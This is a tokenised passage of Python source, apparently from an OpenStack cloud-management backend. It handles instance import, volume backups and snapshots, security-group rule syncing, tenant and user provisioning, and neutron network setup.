( CloudBackendError , e ) <EOL> else : <EOL> logger . info ( '<STR_LIT>' , instance . uuid ) <EOL> event_logger . instance . info ( <EOL> '<STR_LIT>' , <EOL> event_type = '<STR_LIT>' , <EOL> event_context = { '<STR_LIT>' : instance } ) <EOL> def import_instance ( self , membership , instance_id , template_id = None ) : <EOL> try : <EOL> session = self . create_session ( membership = membership ) <EOL> nova = self . create_nova_client ( session ) <EOL> cinder = self . create_cinder_client ( session ) <EOL> except keystone_exceptions . ClientException as e : <EOL> logger . exception ( '<STR_LIT>' ) <EOL> six . reraise ( CloudBackendError , e ) <EOL> except cinder_exceptions . ClientException as e : <EOL> logger . exception ( '<STR_LIT>' ) <EOL> six . reraise ( CloudBackendError , e ) <EOL> try : <EOL> backend_instance = nova . servers . get ( instance_id ) <EOL> except nova_exceptions . NotFound : <EOL> logger . exception ( '<STR_LIT>' , instance_id ) <EOL> return <EOL> with transaction . atomic ( ) : <EOL> try : <EOL> system_volume , data_volume = self . _get_instance_volumes ( nova , cinder , instance_id ) <EOL> if template_id : <EOL> try : <EOL> template = models . Template . objects . get ( uuid = template_id ) <EOL> except models . Template . DoesNotExist : <EOL> logger . exception ( '<STR_LIT>' , template_id ) <EOL> six . reraise ( CloudBackendError , e ) <EOL> else : <EOL> template = self . _get_instance_template ( system_volume , membership , instance_id ) <EOL> cores , ram , flavor_name = self . _get_flavor_info ( nova , backend_instance ) <EOL> state = self . _get_instance_state ( backend_instance ) <EOL> except LookupError as e : <EOL> logger . exception ( '<STR_LIT>' , instance_id ) <EOL> six . reraise ( CloudBackendError , e ) <EOL> nc_security_groups = [ ] <EOL> for sg in backend_instance . security_groups : <EOL> try : <EOL> nc_security_groups . append ( <EOL> models . SecurityGroup . objects . get ( name = sg [ '<STR_LIT:name>' ] , cloud_project_membership = membership ) ) <EOL> except models . SecurityGroup . DoesNotExist as e : <EOL> logger . exception ( '<STR_LIT>' , instance_id ) <EOL> six . reraise ( CloudBackendError , e ) <EOL> nc_instance = models . Instance ( <EOL> name = backend_instance . name or '<STR_LIT>' , <EOL> template = template , <EOL> agreed_sla = template . sla_level , <EOL> flavor_name = flavor_name , <EOL> cores = cores , <EOL> ram = ram , <EOL> key_name = backend_instance . key_name or '<STR_LIT>' , <EOL> system_volume_id = system_volume . id , <EOL> system_volume_size = self . get_core_disk_size ( system_volume . size ) , <EOL> data_volume_id = data_volume . id , <EOL> data_volume_size = self . get_core_disk_size ( data_volume . size ) , <EOL> state = state , <EOL> start_time = self . _get_instance_start_time ( backend_instance ) , <EOL> cloud_project_membership = membership , <EOL> backend_id = backend_instance . id , <EOL> ) <EOL> ips = self . _get_instance_ips ( backend_instance ) <EOL> if '<STR_LIT>' in ips : <EOL> nc_instance . internal_ips = ips [ '<STR_LIT>' ] <EOL> if '<STR_LIT>' in ips : <EOL> nc_instance . external_ips = ips [ '<STR_LIT>' ] <EOL> nc_instance . save ( ) <EOL> for nc_sg in nc_security_groups : <EOL> models . InstanceSecurityGroup . objects . create ( <EOL> instance = nc_instance , <EOL> security_group = nc_sg , <EOL> ) <EOL> event_logger . instance_import . info ( <EOL> '<STR_LIT>' , <EOL> event_type = '<STR_LIT>' , <EOL> event_context = { '<STR_LIT>' : instance_id } ) <EOL> logger . info ( '<STR_LIT>' , nc_instance . uuid ) <EOL> return nc_instance <EOL> def backup_instance ( self , instance ) : <EOL> logger . debug ( '<STR_LIT>' , instance . uuid ) <EOL> try : <EOL> membership = instance . cloud_project_membership <EOL> session = self . create_session ( membership = membership ) <EOL> nova = self . create_nova_client ( session ) <EOL> cinder = self . create_cinder_client ( session ) <EOL> backups = [ ] <EOL> attached_volumes = self . get_attached_volumes ( instance . backend_id , nova ) <EOL> for volume in attached_volumes : <EOL> snapshot = self . create_snapshot ( volume . id , cinder ) . id <EOL> temporary_volume = self . create_volume_from_snapshot ( snapshot , cinder ) <EOL> backup = self . create_volume_backup ( temporary_volume , volume . device , cinder ) <EOL> backups . append ( backup ) <EOL> self . delete_volume ( temporary_volume , cinder ) <EOL> self . delete_snapshot ( snapshot , cinder ) <EOL> except ( nova_exceptions . ClientException , cinder_exceptions . ClientException , <EOL> keystone_exceptions . ClientException , CloudBackendInternalError ) as e : <EOL> logger . exception ( '<STR_LIT>' , instance . uuid ) <EOL> six . reraise ( CloudBackendError , e ) <EOL> else : <EOL> logger . info ( '<STR_LIT>' , instance . uuid ) <EOL> return backups <EOL> def clone_volumes ( self , membership , volume_ids , prefix = '<STR_LIT>' ) : <EOL> logger . debug ( '<STR_LIT>' , '<STR_LIT:U+002CU+0020>' . join ( volume_ids ) ) <EOL> try : <EOL> session = self . create_session ( membership = membership ) <EOL> cinder = self . create_cinder_client ( session ) <EOL> cloned_volume_ids = [ ] <EOL> for volume_id in volume_ids : <EOL> snapshot = self . create_snapshot ( volume_id , cinder ) <EOL> membership . add_quota_usage ( '<STR_LIT>' , self . get_core_disk_size ( snapshot . size ) ) <EOL> promoted_volume_id = self . create_volume_from_snapshot ( snapshot . id , cinder , prefix = prefix ) <EOL> cloned_volume_ids . append ( promoted_volume_id ) <EOL> membership . add_quota_usage ( '<STR_LIT>' , self . get_core_disk_size ( snapshot . size ) ) <EOL> self . delete_snapshot ( snapshot . id , cinder ) <EOL> if not self . _wait_for_snapshot_deletion ( snapshot . id , cinder ) : <EOL> logger . exception ( '<STR_LIT>' , snapshot . id ) <EOL> raise CloudBackendInternalError ( ) <EOL> membership . add_quota_usage ( '<STR_LIT>' , - self . get_core_disk_size ( snapshot . size ) ) <EOL> except ( cinder_exceptions . ClientException , <EOL> keystone_exceptions . ClientException , CloudBackendInternalError ) as e : <EOL> logger . exception ( '<STR_LIT>' , '<STR_LIT:U+002CU+0020>' . join ( volume_ids ) ) <EOL> six . reraise ( CloudBackendError , e ) <EOL> else : <EOL> logger . info ( '<STR_LIT>' , '<STR_LIT:U+002CU+0020>' . join ( volume_ids ) ) <EOL> return cloned_volume_ids <EOL> def create_snapshots ( self , membership , volume_ids , prefix = '<STR_LIT>' ) : <EOL> logger . debug ( '<STR_LIT>' , '<STR_LIT:U+002CU+0020>' . join ( volume_ids ) ) <EOL> try : <EOL> session = self . create_session ( membership = membership ) <EOL> cinder = self . create_cinder_client ( session ) <EOL> snapshot_ids = [ ] <EOL> for volume_id in volume_ids : <EOL> snapshot = self . create_snapshot ( volume_id , cinder ) <EOL> membership . add_quota_usage ( '<STR_LIT>' , self . get_core_disk_size ( snapshot . size ) ) <EOL> snapshot_ids . append ( snapshot . id ) <EOL> except ( cinder_exceptions . ClientException , <EOL> keystone_exceptions . ClientException , CloudBackendInternalError ) as e : <EOL> logger . exception ( '<STR_LIT>' , '<STR_LIT:U+002CU+0020>' . join ( volume_ids ) ) <EOL> six . reraise ( CloudBackendError , e ) <EOL> else : <EOL> logger . info ( '<STR_LIT>' , '<STR_LIT:U+002CU+0020>' . join ( snapshot_ids ) ) <EOL> return snapshot_ids <EOL> def promote_snapshots_to_volumes ( self , membership , snapshot_ids , prefix = '<STR_LIT>' ) : <EOL> logger . debug ( '<STR_LIT>' , '<STR_LIT:U+002CU+0020>' . join ( snapshot_ids ) ) <EOL> try : <EOL> session = self . create_session ( membership = membership ) <EOL> cinder = self . create_cinder_client ( session ) <EOL> promoted_volume_ids = [ ] <EOL> for snapshot_id in snapshot_ids : <EOL> snapshot = cinder . volume_snapshots . get ( snapshot_id ) <EOL> promoted_volume_id = self . create_volume_from_snapshot ( snapshot_id , cinder , prefix = prefix ) <EOL> promoted_volume_ids . append ( promoted_volume_id ) <EOL> membership . add_quota_usage ( '<STR_LIT>' , self . get_core_disk_size ( snapshot . size ) ) <EOL> except ( cinder_exceptions . ClientException , <EOL> keystone_exceptions . ClientException , CloudBackendInternalError ) as e : <EOL> logger . exception ( '<STR_LIT>' , '<STR_LIT:U+002CU+0020>' . join ( snapshot_ids ) ) <EOL> six . reraise ( CloudBackendError , e ) <EOL> else : <EOL> logger . info ( '<STR_LIT>' , '<STR_LIT:U+002CU+0020>' . join ( promoted_volume_ids ) ) <EOL> return promoted_volume_ids <EOL> def delete_volumes ( self , membership , volume_ids ) : <EOL> logger . debug ( '<STR_LIT>' , '<STR_LIT:U+002CU+0020>' . join ( volume_ids ) ) <EOL> try : <EOL> session = self . create_session ( membership = membership ) <EOL> cinder = self . create_cinder_client ( session ) <EOL> for volume_id in volume_ids : <EOL> size = cinder . volumes . get ( volume_id ) . size <EOL> self . delete_volume ( volume_id , cinder ) <EOL> if self . _wait_for_volume_deletion ( volume_id , cinder ) : <EOL> membership . add_quota_usage ( '<STR_LIT>' , - self . get_core_disk_size ( size ) ) <EOL> else : <EOL> logger . exception ( '<STR_LIT>' , volume_id ) <EOL> except ( cinder_exceptions . ClientException , <EOL> keystone_exceptions . ClientException , CloudBackendInternalError ) as e : <EOL> logger . exception ( <EOL> '<STR_LIT>' , '<STR_LIT:U+002CU+0020>' . join ( volume_ids ) ) <EOL> six . reraise ( CloudBackendError , e ) <EOL> else : <EOL> logger . info ( <EOL> '<STR_LIT>' , '<STR_LIT:U+002CU+0020>' . join ( volume_ids ) ) <EOL> def delete_snapshots ( self , membership , snapshot_ids ) : <EOL> logger . debug ( '<STR_LIT>' , '<STR_LIT:U+002CU+0020>' . join ( snapshot_ids ) ) <EOL> try : <EOL> session = self . create_session ( membership = membership ) <EOL> cinder = self . create_cinder_client ( session ) <EOL> for snapshot_id in snapshot_ids : <EOL> size = cinder . volume_snapshots . get ( snapshot_id ) . size <EOL> self . delete_snapshot ( snapshot_id , cinder ) <EOL> if self . _wait_for_snapshot_deletion ( snapshot_id , cinder ) : <EOL> membership . add_quota_usage ( '<STR_LIT>' , - self . get_core_disk_size ( size ) ) <EOL> else : <EOL> logger . exception ( '<STR_LIT>' , snapshot_id ) <EOL> except ( cinder_exceptions . ClientException , <EOL> keystone_exceptions . ClientException , CloudBackendInternalError ) as e : <EOL> logger . exception ( <EOL> '<STR_LIT>' , '<STR_LIT:U+002CU+0020>' . join ( snapshot_ids ) ) <EOL> six . reraise ( CloudBackendError , e ) <EOL> else : <EOL> logger . info ( <EOL> '<STR_LIT>' , '<STR_LIT:U+002CU+0020>' . join ( snapshot_ids ) ) <EOL> def push_instance_security_groups ( self , instance ) : <EOL> SecurityGroup = instance . security_groups . model . security_group . get_queryset ( ) . model <EOL> try : <EOL> membership = instance . cloud_project_membership <EOL> session = self . create_session ( membership = membership ) <EOL> nova = self . create_nova_client ( session ) <EOL> server_id = instance . backend_id <EOL> backend_groups = nova . servers . list_security_group ( server_id ) <EOL> backend_ids = set ( g . id for g in backend_groups ) <EOL> nc_ids = set ( <EOL> SecurityGroup . objects <EOL> . filter ( instance_groups__instance__backend_id = server_id ) <EOL> . exclude ( backend_id = '<STR_LIT>' ) <EOL> . values_list ( '<STR_LIT>' , flat = True ) <EOL> ) <EOL> for group_id in backend_ids - nc_ids : <EOL> try : <EOL> nova . servers . remove_security_group ( server_id , group_id ) <EOL> except nova_exceptions . ClientException : <EOL> logger . exception ( '<STR_LIT>' , <EOL> group_id , server_id ) <EOL> else : <EOL> logger . info ( '<STR_LIT>' , <EOL> group_id , server_id ) <EOL> for group_id in nc_ids - backend_ids : <EOL> try : <EOL> nova . servers . add_security_group ( server_id , group_id ) <EOL> except nova_exceptions . ClientException : <EOL> logger . exception ( '<STR_LIT>' , <EOL> group_id , server_id ) <EOL> else : <EOL> logger . info ( '<STR_LIT>' , <EOL> group_id , server_id ) <EOL> except keystone_exceptions . ClientException as e : <EOL> logger . exception ( '<STR_LIT>' ) <EOL> six . reraise ( CloudBackendError , e ) <EOL> def extend_disk ( self , instance ) : <EOL> try : <EOL> membership = instance . cloud_project_membership <EOL> session = self . create_session ( membership = membership ) <EOL> nova = self . create_nova_client ( session ) <EOL> cinder = self . create_cinder_client ( session ) <EOL> server_id = instance . backend_id <EOL> volume = cinder . volumes . get ( instance . data_volume_id ) <EOL> new_core_size = instance . data_volume_size <EOL> old_core_size = self . get_core_disk_size ( volume . size ) <EOL> new_backend_size = self . get_backend_disk_size ( new_core_size ) <EOL> new_core_size_gib = int ( round ( new_core_size / <NUM_LIT> ) ) <EOL> if old_core_size == new_core_size : <EOL> logger . info ( '<STR_LIT>' , <EOL> volume . id , new_core_size ) <EOL> return <EOL> elif old_core_size > new_core_size : <EOL> logger . warning ( '<STR_LIT>' , <EOL> volume . id , new_core_size , old_core_size ) <EOL> event_logger . instance_volume . error ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> event_type = '<STR_LIT>' , <EOL> event_context = { '<STR_LIT>' : instance } <EOL> ) <EOL> return <EOL> self . _detach_volume ( nova , cinder , server_id , volume . id , instance . uuid ) <EOL> try : <EOL> self . _extend_volume ( cinder , volume , new_backend_size ) <EOL> storage_delta = new_core_size - old_core_size <EOL> membership . add_quota_usage ( '<STR_LIT>' , storage_delta ) <EOL> except cinder_exceptions . OverLimit : <EOL> logger . warning ( <EOL> '<STR_LIT>' , <EOL> volume . id , <EOL> ) <EOL> event_logger . instance_volume . error ( <EOL> "<STR_LIT>" , <EOL> event_type = '<STR_LIT>' , <EOL> event_context = { '<STR_LIT>' : instance } , <EOL> ) <EOL> instance . data_volume_size = old_core_size <EOL> instance . save ( ) <EOL> raise <EOL> finally : <EOL> self . _attach_volume ( nova , cinder , server_id , volume . id , instance . uuid ) <EOL> except cinder_exceptions . OverLimit : <EOL> pass <EOL> except ( nova_exceptions . ClientException , cinder_exceptions . ClientException ) as e : <EOL> logger . exception ( '<STR_LIT>' , instance . uuid ) <EOL> six . reraise ( CloudBackendError , e ) <EOL> else : <EOL> logger . info ( '<STR_LIT>' , instance . uuid ) <EOL> event_logger . instance_volume . info ( <EOL> "<STR_LIT>" , <EOL> event_type = '<STR_LIT>' , <EOL> event_context = { '<STR_LIT>' : instance , '<STR_LIT>' : new_core_size_gib } , <EOL> ) <EOL> def update_flavor ( self , instance , flavor ) : <EOL> try : <EOL> membership = instance . cloud_project_membership <EOL> session = self . create_session ( membership = membership ) <EOL> nova = self . create_nova_client ( session ) <EOL> server_id = instance . backend_id <EOL> flavor_id = flavor . backend_id <EOL> nova . servers . resize ( server_id , flavor_id , '<STR_LIT>' ) <EOL> if not self . _wait_for_instance_status ( server_id , nova , '<STR_LIT>' ) : <EOL> logger . error ( <EOL> '<STR_LIT>' , <EOL> instance . uuid , <EOL> ) <EOL> raise CloudBackendError ( <EOL> '<STR_LIT>' % instance . uuid , <EOL> ) <EOL> nova . servers . confirm_resize ( server_id ) <EOL> if not self . _wait_for_instance_status ( server_id , nova , '<STR_LIT>' ) : <EOL> logger . error ( <EOL> '<STR_LIT>' , <EOL> instance . uuid , <EOL> ) <EOL> raise CloudBackendError ( <EOL> '<STR_LIT>' % instance . uuid , <EOL> ) <EOL> except ( nova_exceptions . ClientException , cinder_exceptions . ClientException ) as e : <EOL> logger . exception ( '<STR_LIT>' , instance . uuid ) <EOL> event_logger . instance_flavor . error ( <EOL> '<STR_LIT>' , <EOL> event_type = '<STR_LIT>' , <EOL> event_context = { '<STR_LIT>' : instance , '<STR_LIT>' : flavor } <EOL> ) <EOL> six . reraise ( CloudBackendError , e ) <EOL> except CloudBackendError : <EOL> event_logger . instance_flavor . error ( <EOL> '<STR_LIT>' , <EOL> event_type = '<STR_LIT>' , <EOL> event_context = { '<STR_LIT>' : instance , '<STR_LIT>' : flavor } <EOL> ) <EOL> raise <EOL> else : <EOL> logger . info ( '<STR_LIT>' , instance . uuid ) <EOL> event_logger . instance_flavor . info ( <EOL> '<STR_LIT>' , <EOL> event_type = '<STR_LIT>' , <EOL> event_context = { '<STR_LIT>' : instance , '<STR_LIT>' : flavor } , <EOL> ) <EOL> def get_nova_usage ( self , membership , start_date , end_date ) : <EOL> try : <EOL> session = self . create_session ( membership = membership ) <EOL> nova = self . create_nova_client ( session ) <EOL> usage = nova . usage . get ( tenant_id = membership . tenant_id , start = start_date , end = end_date ) <EOL> except nova_exceptions . ClientException as e : <EOL> logger . error ( '<STR_LIT>' , membership . pk ) <EOL> six . reraise ( CloudBackendError , e ) <EOL> else : <EOL> return { <EOL> '<STR_LIT>' : getattr ( usage , "<STR_LIT>" , <NUM_LIT:0> ) , <EOL> '<STR_LIT>' : getattr ( usage , '<STR_LIT>' , <NUM_LIT:0> ) , <EOL> '<STR_LIT>' : getattr ( usage , "<STR_LIT>" , <NUM_LIT:0> ) / <NUM_LIT> , <EOL> '<STR_LIT>' : len ( getattr ( usage , "<STR_LIT>" , [ ] ) ) , <EOL> '<STR_LIT>' : getattr ( usage , "<STR_LIT>" , [ ] ) , <EOL> } <EOL> def update_tenant_name ( self , membership , keystone ) : <EOL> tenant_name = self . get_tenant_name ( membership ) <EOL> if membership . tenant_id : <EOL> logger . info ( '<STR_LIT>' , membership . tenant_id ) <EOL> try : <EOL> keystone . tenants . update ( membership . tenant_id , name = tenant_name ) <EOL> logger . info ( "<STR_LIT>" , <EOL> membership . tenant_id , tenant_name ) <EOL> except keystone_exceptions . NotFound as e : <EOL> logger . warning ( '<STR_LIT>' , membership . tenant_id ) <EOL> six . reraise ( CloudBackendError , e ) <EOL> else : <EOL> logger . warning ( '<STR_LIT>' , <EOL> membership ) <EOL> def get_floating_ips ( self , tenant_id , neutron ) : <EOL> return neutron . list_floatingips ( tenant_id = tenant_id ) [ '<STR_LIT>' ] <EOL> def push_security_group_rules ( self , security_group , nova ) : <EOL> backend_security_group = nova . security_groups . get ( group_id = security_group . backend_id ) <EOL> backend_rules = { <EOL> rule [ '<STR_LIT:id>' ] : self . _normalize_security_group_rule ( rule ) <EOL> for rule in backend_security_group . rules <EOL> } <EOL> nonexistent_rules = [ ] <EOL> unsynchronized_rules = [ ] <EOL> extra_rule_ids = backend_rules . keys ( ) <EOL> for nc_rule in security_group . rules . all ( ) : <EOL> if nc_rule . backend_id not in backend_rules : <EOL> nonexistent_rules . append ( nc_rule ) <EOL> else : <EOL> backend_rule = backend_rules [ nc_rule . backend_id ] <EOL> if not self . _are_rules_equal ( backend_rule , nc_rule ) : <EOL> unsynchronized_rules . append ( nc_rule ) <EOL> extra_rule_ids . remove ( nc_rule . backend_id ) <EOL> for backend_rule_id in extra_rule_ids : <EOL> logger . debug ( '<STR_LIT>' , backend_rule_id ) <EOL> try : <EOL> nova . security_group_rules . delete ( backend_rule_id ) <EOL> except nova_exceptions . ClientException : <EOL> logger . exception ( '<STR_LIT>' , <EOL> backend_rule_id , security_group ) <EOL> else : <EOL> logger . info ( '<STR_LIT>' , backend_rule_id ) <EOL> for nc_rule in unsynchronized_rules : <EOL> logger . debug ( '<STR_LIT>' , nc_rule . backend_id ) <EOL> try : <EOL> nova . security_group_rules . delete ( nc_rule . backend_id ) <EOL> except nova_exceptions . ClientException : <EOL> logger . exception ( '<STR_LIT>' , <EOL> nc_rule . backend_id , security_group ) <EOL> else : <EOL> logger . info ( '<STR_LIT>' , <EOL> nc_rule . backend_id ) <EOL> for nc_rule in unsynchronized_rules + nonexistent_rules : <EOL> logger . debug ( '<STR_LIT>' , nc_rule . id ) <EOL> try : <EOL> if nc_rule . protocol == '<STR_LIT>' : <EOL> nc_rule_protocol = None <EOL> else : <EOL> nc_rule_protocol = nc_rule . protocol <EOL> nova . security_group_rules . create ( <EOL> parent_group_id = security_group . backend_id , <EOL> ip_protocol = nc_rule_protocol , <EOL> from_port = nc_rule . from_port , <EOL> to_port = nc_rule . to_port , <EOL> cidr = nc_rule . cidr , <EOL> ) <EOL> except nova_exceptions . ClientException as e : <EOL> logger . exception ( '<STR_LIT>' , <EOL> nc_rule , security_group ) <EOL> six . reraise ( CloudBackendError , e ) <EOL> else : <EOL> logger . info ( '<STR_LIT>' , nc_rule . id ) <EOL> def pull_security_group_rules ( self , security_group , nova ) : <EOL> backend_security_group = nova . security_groups . get ( group_id = security_group . backend_id ) <EOL> backend_rules = [ <EOL> self . _normalize_security_group_rule ( r ) <EOL> for r in backend_security_group . rules <EOL> ] <EOL> nonexistent_rules = [ ] <EOL> unsynchronized_rules = [ ] <EOL> extra_rules = security_group . rules . exclude ( backend_id__in = [ r [ '<STR_LIT:id>' ] for r in backend_rules ] ) <EOL> with transaction . atomic ( ) : <EOL> for backend_rule in backend_rules : <EOL> try : <EOL> nc_rule = security_group . rules . get ( backend_id = backend_rule [ '<STR_LIT:id>' ] ) <EOL> if not self . _are_rules_equal ( backend_rule , nc_rule ) : <EOL> unsynchronized_rules . append ( backend_rule ) <EOL> except security_group . rules . model . DoesNotExist : <EOL> nonexistent_rules . append ( backend_rule ) <EOL> extra_rules . delete ( ) <EOL> logger . info ( '<STR_LIT>' ) <EOL> for backend_rule in unsynchronized_rules : <EOL> security_group . rules . filter ( backend_id = backend_rule [ '<STR_LIT:id>' ] ) . update ( <EOL> from_port = backend_rule [ '<STR_LIT>' ] , <EOL> to_port = backend_rule [ '<STR_LIT>' ] , <EOL> protocol = backend_rule [ '<STR_LIT>' ] , <EOL> cidr = backend_rule [ '<STR_LIT>' ] [ '<STR_LIT>' ] , <EOL> ) <EOL> logger . debug ( '<STR_LIT>' ) <EOL> for backend_rule in nonexistent_rules : <EOL> rule = security_group . rules . create ( <EOL> from_port = backend_rule [ '<STR_LIT>' ] , <EOL> to_port = backend_rule [ '<STR_LIT>' ] , <EOL> protocol = backend_rule [ '<STR_LIT>' ] , <EOL> cidr = backend_rule [ '<STR_LIT>' ] [ '<STR_LIT>' ] , <EOL> backend_id = backend_rule [ '<STR_LIT:id>' ] , <EOL> ) <EOL> logger . info ( '<STR_LIT>' , rule . id ) <EOL> def get_or_create_user ( self , membership , keystone ) : <EOL> User = get_user_model ( ) <EOL> if membership . username : <EOL> try : <EOL> logger . info ( '<STR_LIT>' ) <EOL> self . create_session ( membership = membership , check_tenant = False ) <EOL> logger . info ( '<STR_LIT>' , membership . username ) <EOL> return membership . username , membership . password <EOL> except keystone_exceptions . AuthorizationFailure : <EOL> logger . info ( '<STR_LIT>' , membership . username ) <EOL> username = membership . username <EOL> else : <EOL> username = '<STR_LIT>' . format ( <EOL> self . _get_project_ascii_name ( membership . project ) , <EOL> User . objects . make_random_password ( ) , <EOL> ) [ : self . MAX_USERNAME_LENGTH ] <EOL> password = User . objects . make_random_password ( ) <EOL> logger . info ( '<STR_LIT>' , username ) <EOL> keystone . users . create ( <EOL> name = username , <EOL> password = password , <EOL> ) <EOL> logger . info ( '<STR_LIT>' , username ) <EOL> return username , password <EOL> def get_or_create_tenant ( self , membership , keystone ) : <EOL> tenant_name = self . get_tenant_name ( membership ) <EOL> if membership . tenant_id : <EOL> logger . info ( '<STR_LIT>' , membership . tenant_id ) <EOL> try : <EOL> return keystone . tenants . get ( membership . tenant_id ) <EOL> except keystone_exceptions . NotFound : <EOL> logger . warning ( '<STR_LIT>' , membership . tenant_id ) <EOL> logger . info ( '<STR_LIT>' , tenant_name ) <EOL> try : <EOL> return keystone . tenants . create ( <EOL> tenant_name = tenant_name , <EOL> description = membership . project . description , <EOL> ) <EOL> except keystone_exceptions . Conflict : <EOL> logger . info ( '<STR_LIT>' , tenant_name ) <EOL> logger . info ( '<STR_LIT>' , tenant_name ) <EOL> return keystone . tenants . find ( name = tenant_name ) <EOL> def ensure_user_is_tenant_admin ( self , username , tenant , keystone ) : <EOL> logger . info ( '<STR_LIT>' , <EOL> username , tenant . name ) <EOL> logger . debug ( '<STR_LIT>' , username ) <EOL> admin_user = keystone . users . find ( name = username ) <EOL> logger . debug ( '<STR_LIT>' ) <EOL> admin_role = keystone . roles . find ( name = '<STR_LIT>' ) <EOL> try : <EOL> keystone . roles . add_user_role ( <EOL> user = admin_user . id , <EOL> role = admin_role . id , <EOL> tenant = tenant . id , <EOL> ) <EOL> except keystone_exceptions . Conflict : <EOL> logger . info ( '<STR_LIT>' , <EOL> username , tenant . name ) <EOL> def get_or_create_internal_network ( self , membership , neutron ) : <EOL> logger . info ( '<STR_LIT>' , membership . tenant_id ) <EOL> if membership . internal_network_id : <EOL> try : <EOL> response = neutron . show_network ( membership . internal_network_id ) <EOL> except neutron_exceptions . NeutronClientException as e : <EOL> logger . exception ( '<STR_LIT>' , <EOL> membership . internal_network_id ) <EOL> six . reraise ( CloudBackendError , e ) <EOL> else : <EOL> logger . info ( '<STR_LIT>' , membership . internal_network_id ) <EOL> network_name = response [ '<STR_LIT>' ] [ '<STR_LIT:name>' ] <EOL> subnet_id = response [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ <NUM_LIT:0> ] <EOL> self . get_or_create_router ( neutron , network_name , subnet_id , membership . tenant_id ) <EOL> return membership . internal_network_id <EOL> network_name = self . get_tenant_internal_network_name ( membership ) <EOL> networks = neutron . list_networks ( name = network_name ) [ '<STR_LIT>' ] <EOL> if networks : <EOL> network = networks [ <NUM_LIT:0> ] <EOL> membership . internal_network_id = network [ '<STR_LIT:id>' ] <EOL> membership . save ( ) <EOL> logger . info ( '<STR_LIT>' , network_name , membership . tenant_id ) <EOL> subnet_id = network [ '<STR_LIT>' ] [ <NUM_LIT:0> ] <EOL> self . get_or_create_router ( neutron , network_name , subnet_id , membership . tenant_id ) <EOL> else : <EOL> network = { <EOL> '<STR_LIT:name>' : network_name , <EOL> '<STR_LIT>' : membership . tenant_id , <EOL> } <EOL> create_response = neutron . create_network ( { '<STR_LIT>' : [ network ] } ) <EOL> network_id = create_response [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT:id>' ] <EOL> membership . internal_network_id = network_id <EOL> membership . save ( ) <EOL> logger . info ( '<STR_LIT>' , network_name , membership . tenant_id ) <EOL> subnet_name = '<STR_LIT>' . format ( network_name ) <EOL> logger . info ( '<STR_LIT>' , subnet_name ) <EOL> subnet_data = { <EOL> '<STR_LIT>' : membership . internal_network_id , <EOL> '<STR_LIT>' : membership . tenant_id , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ <EOL> { <EOL> '<STR_LIT:start>' : '<STR_LIT>' , <EOL> '<STR_LIT:end>' : '<STR_LIT>' <EOL> } <EOL> ] , <EOL> '<STR_LIT:name>' : subnet_name , <EOL> '<STR_LIT>' : <NUM_LIT:4> , <EOL> '<STR_LIT>' : True , <EOL> } <EOL> create_response = neutron . create_subnet ( { '<STR_LIT>' : [ subnet_data ] } ) <EOL> self . get_or_create_router ( neutron , network_name , create_response [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT:id>' ] , <EOL> membership . tenant_id ) <EOL> return membership . internal_network_id <EOL> def connect_membership_to_external_network ( self , membership , external_network_id , neutron ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> response = neutron . show_network ( external_network_id ) <EOL> except neutron_exceptions . NeutronClientException as e : <EOL> logger . exception ( '<STR_LIT>' , external_network_id ) <EOL> six . reraise ( CloudBackendError , e ) <EOL> else : <EOL> network_name = response [ '<STR_LIT>' ] [ '<STR_LIT:name>' ] <EOL> subnet_id = response [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ <NUM_LIT:0> ] <EOL> self . get_or_create_router ( neutron , network_name , subnet_id , membership . tenant_id , <EOL> external = True , network_id = response [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] ) <EOL> membership . external_network_id = external_network_id <EOL> membership . save ( ) <EOL> logger . info ( '<STR_LIT>' , <EOL> external_network_id , membership . tenant_id ) <EOL> return external_network_id <EOL> def get_or_create_external_network ( self , membership , neutron , network_ip , network_prefix , <EOL> vlan_id = None , vxlan_id = None , ips_count = None ) : <EOL> if membership . external_network_id : <EOL> self . connect_membership_to_external_network ( membership , membership . external_network_id , neutron ) <EOL> network_name = '<STR_LIT>' . format ( self . create_backend_name ( ) ) <EOL> network = { <EOL> '<STR_LIT:name>' : network_name , <EOL> '<STR_LIT>' : membership . tenant_id , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> if vlan_id : <EOL> network [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> network [ '<STR_LIT>' ] = vlan_id <EOL> elif vxlan_id : <EOL> network [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> network [ '<STR_LIT>' ] = vxlan_id <EOL> else : <EOL> raise CloudBackendError ( '<STR_LIT>' ) <EOL> create_response = neutron . create_network ( { '<STR_LIT>' : [ network ] } ) <EOL> network_id = create_response [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT:id>' ] <EOL> logger . info ( '<STR_LIT>' , network_name ) <EOL> membership . external_network_id = network_id <EOL> membership . save ( ) <EOL> subnet_name = '<STR_LIT>' . format ( network_name ) <EOL> cidr = '<STR_LIT>' . format ( network_ip , network_prefix ) <EOL> subnet_data = { <EOL> '<STR_LIT>' : membership . external_network_id , <EOL> '<STR_LIT>' : membership . tenant_id , <EOL> '<STR_LIT>' : cidr , <EOL> '<STR_LIT:name>' : subnet_name , <EOL> '<STR_LIT>' : <NUM_LIT:4> , <EOL> '<STR_LIT>' : False , <EOL> } <EOL> create_response = neutron . create_subnet ( { '<STR_LIT>' : [ subnet_data ] } ) <EOL> logger . info ( '<STR_LIT>' , subnet_name ) <EOL> self . get_or_create_router ( neutron , network_name , create_response [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT:id>' ] , <EOL> membership . tenant_id ) <EOL> floating_ip = { <EOL> '<STR_LIT>' : membership . external_network_id , <EOL> } <EOL> if vlan_id is not None and ips_count is not None : <EOL> for i in range ( ips_count ) : <EOL> ip = neutron . create_floatingip ( { '<STR_LIT>' : floating_ip } ) [ '<STR_LIT>' ] <EOL> logger . info ( '<STR_LIT>' , <EOL> ip [ '<STR_LIT>' ] , network_name ) <EOL> return membership . external_network_id <EOL> def detect_external_network ( self , membership , neutron ) : <EOL> routers = neutron . list_routers ( tenant_id = membership . tenant_id ) 